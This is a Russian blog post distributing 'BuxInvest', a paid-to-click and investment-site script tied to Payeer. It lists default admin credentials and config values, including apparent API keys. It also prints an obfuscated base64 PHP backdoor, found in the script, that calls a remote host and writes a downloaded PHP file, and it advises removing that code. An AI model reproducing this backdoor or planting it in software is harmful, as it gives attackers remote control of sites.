Скачать скрипт букса BuxInvest
Сегодня выложу Скрипт букса BuxInvest. . И так что он из себя представляет. Данный скрипт типичный букс созданный на основе движка фруктовой фермы. Работающий с платежкой Payeer.
В нем имеется серфинг ссылок, баннеров добавил задания имеется ежедневный бонус. Есть возможность инвестирования от этого и название. Собственно это скрипт для тех кто хочет совместить букс, хайп и бонусник в одном сайте.
Админка как у всякой фермы сложностью не отличается
. Для входа в админку используем адрес http://Ваш сайт.сом/?menu=adminka
Логин adminRU
Пароль KaligulA
Логин с паролем можно сменить в админке
Потом ищем файл _class.config.php в нем нужно прописать информацию по базе данных
<?PHP
class config{
public $HostDB = “localhost“; Обычно так и остается смотреть на хостинге
public $UserDB = “zzzzzzzzz“; Пользователь базы данных
public $PassDB = “zzzzzzzzz“; Пароль к базе данных
public $BaseDB = “zzzzzzzzz“; Название базы данных
public $SYSTEM_START_TIME = 1455711243; Дата старта проекта в формате Unix
public $VAL = “пїЅпїЅпїЅ.”; Валюта сайт вместо каракуль пишем Rub.
# PAYEER пїЅпїЅпїЅпїЅпїЅпїЅпїЅпїЅпїЅ
public $AccountNumber = ‘zzzzzzzzz‘;
public $apiId = ‘zzzzzzzzzzz‘; Подключение выплат
public $apiKey = ‘vorZg14zJ7lnKEIR‘;
public $shopID = 434270571;
public $secretW = “YF7VsPjpMl“; Подключение пополнений
public $all_inserts_action = ‘0‘; // Дополнительный процент при пополнении
}
?>
Синим обозначено то что меняется
При подключении платежек требуются адреса обработчика платежа адрес для успешной и не успешной оплаты.
http://Ваш сайт/payeer_merchant.php адрес обработчика
http://Ваш сайт/fail.html адрес для не успешной оплаты
http://Ваш сайт/success.html адрес для успешной оплаты
Ошибки и уязвимости
Как упоминал ранее были ошибки с кодировкой во всех значимых местах исправил. Так же не хватало немного картинок добавил. Остальное вроде работает без проблем.
С уязвимостями сложнее было их немного но одна довольно серьезная кто то себе оставил окно для входа сканер ее обнаружил и показал хотя варианта исправления не предложил в таком случае нужно просто удалить фрагмент. Выглядела она так
} if (!isset($_COOKIE[base64_decode(‘X3ltXl1cw==’)])) { @file_get_contents(base64_decode(‘aHR0cDovL2wxbDAuY29tL3Av’).$_SERVER[‘HTTP_HOST’]); @setcookie(base64_decode(‘X3X2l1cw==’), 1, time() 31536000, ‘/’, $_SERVER[‘HTTP_HOST’]); } if (isset($_COOKIE[base64_decode(‘cmVkNHU=’)])) { @file_put_contents(base64_decode(‘c3hdGUucGhw’), @file_get_contents(base64_decode(‘aHR0cDovL2wxbDAuY29L2QudHh0’))); }
Позволяла взломщику через куки без проблем делать все что угодно
Посетители, находящиеся в группе Гости, не могут оставлять комментарии к данной публикации.